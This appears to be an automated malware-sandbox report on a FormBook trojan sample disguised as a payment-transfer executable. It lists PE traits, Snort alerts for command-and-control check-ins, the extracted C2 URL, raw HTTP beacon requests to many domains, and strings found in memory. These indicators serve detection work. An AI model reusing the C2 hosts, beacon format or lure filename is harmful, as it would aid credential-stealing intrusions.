Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Contains modern PE file flags such as dynamic base (ASLR) or NX

Show sources

Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Binary contains paths to debug symbols

Show sources

Source:	Binary string: explorer.pdbUGP source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000004.00000002.275433894.0000000002B80000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000004.00000002.275056959.00000000010DF000.00000040.00000001.sdmp, explorer.exe, 00000009.00000002.746780644.0000000004C00000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, explorer.exe
Source:	Binary string: explorer.pdb source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000004.00000002.275433894.0000000002B80000.00000040.00000001.sdmp

Software Vulnerabilities:

Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4x nop then pop edi	4_2_0040E3A2
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4x nop then pop edi	4_2_0040E44A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4x nop then pop edi	9_2_0309E3A2
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4x nop then pop edi	9_2_0309E44A

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49736 -> 50.116.112.43:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49736 -> 50.116.112.43:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49736 -> 50.116.112.43:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49739 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49739 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49739 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49748 -> 185.199.108.153:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49748 -> 185.199.108.153:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49748 -> 185.199.108.153:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49752 -> 176.74.27.137:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49752 -> 176.74.27.137:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49752 -> 176.74.27.137:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49754 -> 164.155.144.220:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49754 -> 164.155.144.220:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49754 -> 164.155.144.220:80

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: www.jaemagreci.com/blr/

Source: global traffic	HTTP traffic detected: GET /blr/?OhNhA=0qfhgAUhFNnGzH7qGfzqggPFhGYeFRXNcWm+JLPBUuQl5doqjpchYq6utkLPlNOTiwpN&Yn=ybdDmfdPTbAT8L HTTP/1.1Host: www.kanaai.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /blr/?OhNhA=zy4aJG0RjbOs5fr8AigFVw38GRzAFltiV345BgDRTDlQ98Z37kqPuyHkyXsUwHWJOif+&Yn=ybdDmfdPTbAT8L HTTP/1.1Host: www.cvmjqcid.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /blr/?OhNhA=iTLpEvItJY3C/iY0O/gMWVvFAW67iqJR4Qa3Cv5AKoajJvRVMc3YtK32u24rykRgHJga&Yn=ybdDmfdPTbAT8L HTTP/1.1Host: www.jaemagreci.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /blr/?OhNhA=BbRt519gnWT2xWYUVSCsYiPJyU2bwfntJXr00JvtFds5dVCPZN8W3I64QGhm0Na3rvFo&Yn=ybdDmfdPTbAT8L HTTP/1.1Host: www.sweetpopntreatz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /blr/?OhNhA=luzvcdoWPFwNnK5D3r055oflJ4B6PNqet6SFuGGCnSWn2ee+CnvcD8UF6pdBh9++nOVu&Yn=ybdDmfdPTbAT8L HTTP/1.1Host: www.long9000.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /blr/?OhNhA=9NQu4cm/N7DYOvYkOtDGizwfZS7YZZztEmXWW7fOjfXAYFPuQogNr8p6dLx09NPCIIrz&Yn=ybdDmfdPTbAT8L HTTP/1.1Host: www.soheilvaseghi.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /blr/?OhNhA=1D6csfaDD7g4t3Q9F8LHNWiGFqnsudQyA5GHpl/5b2nDJwZIkWU76ixs7jAbMlvm1ymY&Yn=ybdDmfdPTbAT8L HTTP/1.1Host: www.gannahealing.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /blr/?OhNhA=Y4Nqpa2r+tF7um99WXv6gSEpOHOatsVE8QqSeJqkcp8K3U81YoxyR3xnMLz5lVrsAPpR&Yn=ybdDmfdPTbAT8L HTTP/1.1Host: www.olgadalila.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /blr/?OhNhA=bjCfXUMydIGN0g8/5RwnbPPnLj5Or6e3tcQCgNEOQF7zRRnTIveAFITP4tBGYavfcP94&Yn=ybdDmfdPTbAT8L HTTP/1.1Host: www.zomapa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View	IP Address: 35.246.6.109 35.246.6.109
Source: Joe Sandbox View	IP Address: 34.102.136.180 34.102.136.180

Source: Joe Sandbox View	ASN Name: IDCFIDCFrontierIncJP IDCFIDCFrontierIncJP
Source: Joe Sandbox View	ASN Name: MULTA-ASN1US MULTA-ASN1US

Source: global traffic	HTTP traffic detected: GET /blr/?OhNhA=0qfhgAUhFNnGzH7qGfzqggPFhGYeFRXNcWm+JLPBUuQl5doqjpchYq6utkLPlNOTiwpN&Yn=ybdDmfdPTbAT8L HTTP/1.1Host: www.kanaai.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /blr/?OhNhA=zy4aJG0RjbOs5fr8AigFVw38GRzAFltiV345BgDRTDlQ98Z37kqPuyHkyXsUwHWJOif+&Yn=ybdDmfdPTbAT8L HTTP/1.1Host: www.cvmjqcid.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /blr/?OhNhA=iTLpEvItJY3C/iY0O/gMWVvFAW67iqJR4Qa3Cv5AKoajJvRVMc3YtK32u24rykRgHJga&Yn=ybdDmfdPTbAT8L HTTP/1.1Host: www.jaemagreci.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /blr/?OhNhA=BbRt519gnWT2xWYUVSCsYiPJyU2bwfntJXr00JvtFds5dVCPZN8W3I64QGhm0Na3rvFo&Yn=ybdDmfdPTbAT8L HTTP/1.1Host: www.sweetpopntreatz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /blr/?OhNhA=luzvcdoWPFwNnK5D3r055oflJ4B6PNqet6SFuGGCnSWn2ee+CnvcD8UF6pdBh9++nOVu&Yn=ybdDmfdPTbAT8L HTTP/1.1Host: www.long9000.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /blr/?OhNhA=9NQu4cm/N7DYOvYkOtDGizwfZS7YZZztEmXWW7fOjfXAYFPuQogNr8p6dLx09NPCIIrz&Yn=ybdDmfdPTbAT8L HTTP/1.1Host: www.soheilvaseghi.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /blr/?OhNhA=1D6csfaDD7g4t3Q9F8LHNWiGFqnsudQyA5GHpl/5b2nDJwZIkWU76ixs7jAbMlvm1ymY&Yn=ybdDmfdPTbAT8L HTTP/1.1Host: www.gannahealing.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /blr/?OhNhA=Y4Nqpa2r+tF7um99WXv6gSEpOHOatsVE8QqSeJqkcp8K3U81YoxyR3xnMLz5lVrsAPpR&Yn=ybdDmfdPTbAT8L HTTP/1.1Host: www.olgadalila.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /blr/?OhNhA=bjCfXUMydIGN0g8/5RwnbPPnLj5Or6e3tcQCgNEOQF7zRRnTIveAFITP4tBGYavfcP94&Yn=ybdDmfdPTbAT8L HTTP/1.1Host: www.zomapa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown

DNS traffic detected: queries for: www.kanaai.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 23 Feb 2021 08:44:23 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingData Raw: 31 63 31 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 53 79 73 74 65 6d 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2f 2a 20 42 61 73 65 20 2a 2f 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 3a 20 31 34 70 78 20 56 65 72 64 61 6e 61 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 68 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 27 4d 69 63 72 6f 73 6f 66 74 20 59 61 48 65 69 27 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 32 30 70 78 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 6f 72 64 2d 62 72 65 61 6b 3a 20 62 72 65 61 6b 2d 77 6f 72 64 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 68 31 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 30 70 78 20 30 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 33 32 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 68 32 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 32 38 38 63 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 70 78 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 70 78 20 30 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 65 65 65 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 68 33 2e 73 75 62 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 32 38 38 63 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a

Source: explorer.exe, 00000005.00000002.754895939.0000000004E61000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	String found in binary or memory: http://www.carbeloy.com
Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	String found in binary or memory: http://www.carbeloy.com/blr/
Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	String found in binary or memory: http://www.carbeloy.com/blr/www.prodhealth.site
Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	String found in binary or memory: http://www.carbeloy.comReferer:
Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	String found in binary or memory: http://www.cvmjqcid.com
Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	String found in binary or memory: http://www.cvmjqcid.com/blr/
Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	String found in binary or memory: http://www.cvmjqcid.com/blr/www.jaemagreci.com
Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	String found in binary or memory: http://www.cvmjqcid.comReferer:
Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	String found in binary or memory: http://www.gannahealing.com
Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	String found in binary or memory: http://www.gannahealing.com/blr/
Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	String found in binary or memory: http://www.gannahealing.com/blr/www.olgadalila.com
Source: explorer.exe, 00000009.00000002.748643610.000000000561F000.00000004.00000001.sdmp	String found in binary or memory: http://www.gannahealing.com/public/blr?OhNhA=1D6csfaDD7g4t3Q9F8LHNWiGFqnsudQyA5GHpl/5b2nDJwZIkWU76ix
Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	String found in binary or memory: http://www.gannahealing.comReferer:
Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	String found in binary or memory: http://www.jaemagreci.com
Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	String found in binary or memory: http://www.jaemagreci.com/blr/
Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	String found in binary or memory: http://www.jaemagreci.com/blr/www.sweetpopntreatz.com
Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	String found in binary or memory: http://www.jaemagreci.comReferer:
Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	String found in binary or memory: http://www.jasa-software.com
Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	String found in binary or memory: http://www.jasa-software.com/blr/
Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	String found in binary or memory: http://www.jasa-software.com/blr/j
Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	String found in binary or memory: http://www.jasa-software.comReferer:
Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	String found in binary or memory: http://www.kanaai.com
Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	String found in binary or memory: http://www.kanaai.com/blr/
Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	String found in binary or memory: http://www.kanaai.com/blr/www.cvmjqcid.com
Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	String found in binary or memory: http://www.kanaai.comReferer:
Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	String found in binary or memory: http://www.kathrynbaierling.com
Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	String found in binary or memory: http://www.kathrynbaierling.com/blr/
Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	String found in binary or memory: http://www.kathrynbaierling.com/blr/www.na230.com
Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	String found in binary or memory: http://www.kathrynbaierling.comReferer:
Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	String found in binary or memory: http://www.long9000.com
Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	String found in binary or memory: http://www.long9000.com/blr/
Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	String found in binary or memory: http://www.long9000.com/blr/www.soheilvaseghi.com
Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	String found in binary or memory: http://www.long9000.comReferer:
Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	String found in binary or memory: http://www.na230.com
Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	String found in binary or memory: http://www.na230.com/blr/
Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	String found in binary or memory: http://www.na230.com/blr/www.jasa-software.com
Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	String found in binary or memory: http://www.na230.comReferer:
Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	String found in binary or memory: http://www.olgadalila.com
Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	String found in binary or memory: http://www.olgadalila.com/blr/
Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	String found in binary or memory: http://www.olgadalila.com/blr/www.zomapa.com
Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	String found in binary or memory: http://www.olgadalila.comReferer:
Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	String found in binary or memory: http://www.prodhealth.site
Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	String found in binary or memory: http://www.prodhealth.site/blr/
Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	String found in binary or memory: http://www.prodhealth.site/blr/www.stanchilo.com
Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	String found in binary or memory: http://www.prodhealth.siteReferer:
Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	String found in binary or memory: http://www.soheilvaseghi.com
Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	String found in binary or memory: http://www.soheilvaseghi.com/blr/
Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	String found in binary or memory: http://www.soheilvaseghi.com/blr/www.gannahealing.com
Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	String found in binary or memory: http://www.soheilvaseghi.comReferer:
Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	String found in binary or memory: http://www.stanchilo.com
Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	String found in binary or memory: http://www.stanchilo.com/blr/
Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	String found in binary or memory: http://www.stanchilo.com/blr/www.yoshiyama-potager.com
Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	String found in binary or memory: http://www.stanchilo.comReferer:
Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	String found in binary or memory: http://www.sweetpopntreatz.com
Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	String found in binary or memory: http://www.sweetpopntreatz.com/blr/
Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	String found in binary or memory: http://www.sweetpopntreatz.com/blr/www.long9000.com
Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	String found in binary or memory: http://www.sweetpopntreatz.comReferer:
Source: explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	String found in binary or memory: http://www.yoshiyama-potager.com
Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	String found in binary or memory: http://www.yoshiyama-potager.com/blr/
Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	String found in binary or memory: http://www.yoshiyama-potager.com/blr/www.kathrynbaierling.com
Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	String found in binary or memory: http://www.yoshiyama-potager.comReferer:
